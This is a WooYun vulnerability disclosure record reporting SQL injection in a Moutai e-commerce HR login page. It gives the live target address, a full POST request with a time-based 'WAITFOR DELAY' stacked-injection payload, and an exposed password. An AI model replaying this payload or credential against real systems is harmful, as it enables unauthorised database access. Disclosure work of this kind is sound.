乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-15: 细节已通知厂商并且等待厂商处理中 2016-04-15: 厂商已经确认,细节仅向厂商公开 2016-04-25: 细节向核心白帽子及相关领域专家公开 2016-05-05: 细节向普通白帽子公开 2016-05-15: 细节向实习白帽子公开 2016-05-30: 细节向公众公开
茅台电商人力资源系统存在SQL注入漏洞
影响系统网址:http://202.98.222.93:5000/rlzy/LoginTo.aspx注入参数:UsersPanel_cbxUsers_VI
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk3MzE5Njk5MQ9kFgICAQ9kFgYCAQ8UKwAGDxYCHgVWYWx1ZQUCOThkZGQ8KwAJAQgUKwAEFgQeEkVuYWJsZUNhbGxiYWNrTW9kZWgeJ0VuYWJsZVN5bmNocm9uaXphdGlvbk9uUGVyZm9ybUNhbGxiYWNrIGhkDxYCHgpJc1NhdmVkQWxsZw8UKwATFCsAARYGHgRUZXh0BRXkurrlipvotYTmupDnpL7kv53pg6gfAAUCOTgeDlJ1bnRpbWVDcmVhdGVkZxQrAAEWBh8EBRXjgIDjgIDilJzilIDlip7lhazlrqQfAAUDMTgyHwVnFCsAARYGHwQFG+OAgOOAgOKUnOKUgOS6uuWKm+iwg+mFjeenkR8ABQMxNzUfBWcUKwABFgYfBAUV44CA44CA4pSc4pSA5bel6LWE56eRHwAFAzE3NB8FZxQrAAEWBh8EBRXjgIDjgIDilJzilIDmoaPmoYjlrqQfAAUDMTc2HwVnFCsAARYGHwQFFeOAgOOAgOKUnOKUgOiBjOensOWKnh8ABQMxNjYfBWcUKwABFgYfBAUV44CA44CA4pSc4pSA5Z+56K6t5YqeHwAFAzE2Nx8FZxQrAAEWBh8EBSHjgIDjgIDilJzilIDlirPliqjnuqrlvovnm5Hlr5/lrqQfAAUDMTc3HwVnFCsAARYGHwQFG+OAgOOAgOKUnOKUgOWKs+S/neeuoeeQhuWupB8ABQMxNzgfBWcUKwABFgYfBAUS44CA44CA4pSc4pSA56S+5L+dHwAFAzExNB8FZxQrAAEWBh8EBQ/nlJ/mtLvmnI3liqHpg6gfAAUCMzMfBWcUKwABFgYfBAUM6IKh5Lu96LSi5YqhHwAFAjIxHwVnFCsAARYGHwQFDOaciemZkOi0ouWKoR8ABQIzMR8FZxQrAAEWBh8EBQzplIDllK7lhazlj7gfAAUCMzYfBWcUKwABFgYfBAUM55Sf5Lqn6L2m6Ze0HwAFAzExNx8FZxQrAAEWBh8EBQznprvpgIDkvJHlip4fAAUDMTEyHwVnFCsAARYGHwQFDOS/oeaBr+S4reW/gx8ABQI3Nh8FZxQrAAEWBh8EBQzkuLTml7botKbmiLcfAAUDMTY0HwVnFCsAARYGHwQFDOW8gOWPkeWNleS9jR8ABQIyMx8FZ2RkZGRkAgMPZBYCZg9kFgJmD2QWAmYPZBYCAgEPFCsABg8WAh8ABQgwMDAwMDk1MWRkZDwrAAkBCBQrAAQWBB8BZx8CaGQPFgIfA2cPFCsABBQrAAEWBh8EBQblvpDlvLofAAUIMDAwMDA5NTEfBWcUKwABFgYfBAUJ5YiY5bmy5YqyHwAFCDAwMDAwODc0HwVnFCsAARYGHwQFDuW+kOW8uijnm5bnq6ApHwAFCDAwMDAwOTc2HwVnFCsAARYGHwQFCeW8oOeOiee+ih8ABQgwMDAwMDg4Nh8FZ2RkZGRkAgUPPCsABgEADxYCHwAFD0lhbVN0cm9uZyEjQDk5OWRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYEBQtjYnhPcmdzJERERAUXVXNlcnNQYW5lbCRjYnhVc2VycyREREQFCGJ0bmxvZ2luBQdidG5FeGl0dsn/WEQw0XNmw8UZQyil4D0dK/7GdQ+cjN51ry+bqo8=&__EVENTVALIDATION=/wEWBALnj5KpAgLmpufNCAKJoNWhAwLH0qW1DtrELtcDaDHhGku5AaKCGWqUXDTMxG53jGq3kQT7P1Xi&cbxOrgs_VI=98&cbxOrgs=%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90%E7%A4%BE%E4%BF%9D%E9%83%A8&cbxOrgs_DDDWS=0:0:11998:0:0:0:-10000:-10000:1:0:0:0&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_DDD_LCustomCallback=&cbxOrgs$DDD$L=98&UsersPanel_cbxUsers_VI=00000951\\\';WAITFOR DELAY \\\'0:0:10\\\'--&UsersPanel$cbxUsers=%E5%BE%90%E5%BC%BA&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:0:0:-10000:-10000:1:0:0:0&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel$cbxUsers$DDD$L=00000951&tbxPassword=IamStrong!#@999&btnlogin=CaterNoMatch&DXScript=1_157,1_89,1_149,1_108,1_115,1_107,1_86,1_141,1_139,1_110,1_88,1_100&DXCss=hr.ico,Globe.css,0_1501,1_9,1_4,0_1503,0_1631,0_1633,1_3,1_2
注入证明:存在堆叠注入,数据库为:Microsoft SQL Server
# 过滤
危害等级:高
漏洞Rank:20
确认时间:2016-04-15 13:26
感谢您的反馈,我们将尽快修复。
暂无